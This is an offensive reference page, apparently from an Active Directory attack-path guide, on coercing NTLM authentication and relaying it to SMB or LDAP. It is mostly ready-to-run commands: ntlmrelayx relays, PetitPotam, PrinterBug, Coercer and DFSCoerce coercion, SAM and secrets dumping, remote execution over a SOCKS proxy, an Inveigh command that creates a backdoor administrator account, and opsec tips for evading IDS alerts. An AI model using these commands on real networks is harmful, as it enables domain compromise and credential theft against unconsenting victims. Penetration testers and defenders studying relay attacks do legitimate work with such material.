CoerceAndRelayNTLMToSMB
Force a target computer to authenticate to an attacker-controlled host via NTLM, then relay that authentication to SMB on another target to gain access.
Applies to: Computer β Computer
Linux Abuse
Step 1: Start ntlmrelayx (relay to SMB target)
# Relay to single target
ntlmrelayx.py -smb2support -t smb://<target-computer> -i
# Relay to multiple targets from file
ntlmrelayx.py -smb2support -tf targets.txt -i
# Auto-dump SAM on relay success
ntlmrelayx.py -smb2support -t smb://<target-computer>
# Execute command on relay success
ntlmrelayx.py -smb2support -t smb://<target-computer> -c 'whoami > C:\pwned.txt'
# Get SOCKS proxy for further access
ntlmrelayx.py -smb2support -t smb://<target-computer> --socks
Step 2a: Coerce via PetitPotam (MS-EFSRPC)
PetitPotam.py -u '<username>' -p '<password>' -d '<domain>' <attacker-ip> <target-computer>
# Unauthenticated (older unpatched DCs):
PetitPotam.py <attacker-ip> <target-computer>
Step 2b: Coerce via PrinterBug / SpoolSample (MS-RPRN)
printerbug.py '<domain>/<username>:<password>'@<target-computer> <attacker-ip>
Step 2c: Coerce via Coercer (multi-method)
# Scan for coerceable methods
coercer scan -t <target-computer> -u <username> -p '<password>' -d <domain>
# Coerce authentication
coercer coerce -t <target-computer> -l <attacker-ip> -u <username> -p '<password>' -d <domain>
Step 2d: Coerce via DFSCoerce (MS-DFSNM)
DFSCoerce.py -u '<username>' -p '<password>' -d '<domain>' <attacker-ip> <target-computer>
Step 3: Use SOCKS proxy from ntlmrelayx for further access
# After relay with --socks, connect via proxychains
proxychains smbclient //<target-computer>/C$ -U '<domain>/<username>'
proxychains secretsdump.py -no-pass '<domain>/<username>'@<target-computer>
proxychains wmiexec.py -no-pass '<domain>/<username>'@<target-computer>
Step 3 alt: Interactive SMB shell via -i flag
# ntlmrelayx opens local port (e.g. 11000) with interactive shell
nc 127.0.0.1 11000
Relay to LDAP instead of SMB (for adding objects, RBCD, shadow credentials)
# Relay to LDAP β add RBCD
ntlmrelayx.py -t ldap://<dc-ip> --delegate-access
# Relay to LDAPS β shadow credentials
ntlmrelayx.py -t ldaps://<dc-ip> --shadow-credentials --shadow-target <target-computer>
Combined one-liner (PetitPotam + relay to dump SAM)
# Terminal 1:
ntlmrelayx.py -smb2support -t smb://<target-computer>
# Terminal 2 (after ntlmrelayx is ready):
PetitPotam.py -u '<username>' -p '<password>' -d '<domain>' <attacker-ip> <coerced-computer>
Windows Abuse
Inveigh (PowerShell β combined capture + relay)
Import-Module Inveigh.ps1
Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target <target-computer> -Command "net user /add hax P@ssw0rd && net localgroup administrators hax /add"
Responder + ntlmrelayx (cross-platform relay)
# Disable Responder SMB/HTTP servers, use it only for capture:
# Edit Responder.conf: SMB = Off, HTTP = Off
python Responder.py -I <interface> -rdw
# Then use ntlmrelayx from Linux side
Pre-requisites & Checks
# SMB signing must be DISABLED on relay target
nmap --script smb2-security-mode -p 445 <target-range>
netexec smb <target-range> --gen-relay-list targets.txt
# Check if target is patchd against PetitPotam unauthenticated:
# CVE-2021-36942 β patched Aug 2021; authenticated coercion still works post-patch
Opsec
- Disable Responder's SMB/HTTP listeners when using ntlmrelayx to avoid conflicts (set
SMB = Off,HTTP = Offin Responder.conf) - Relaying requires SMB signing disabled on the relay target β DCs have it enabled by default, workstations typically do not
- Coercion traffic (port 445 outbound from victim) may alert on NDR/IDS
- PetitPotam unauthenticated vector (CVE-2021-36942) is patched β use authenticated coercion post-patch
- Use
--sockswith ntlmrelayx for repeated access without re-triggering coercion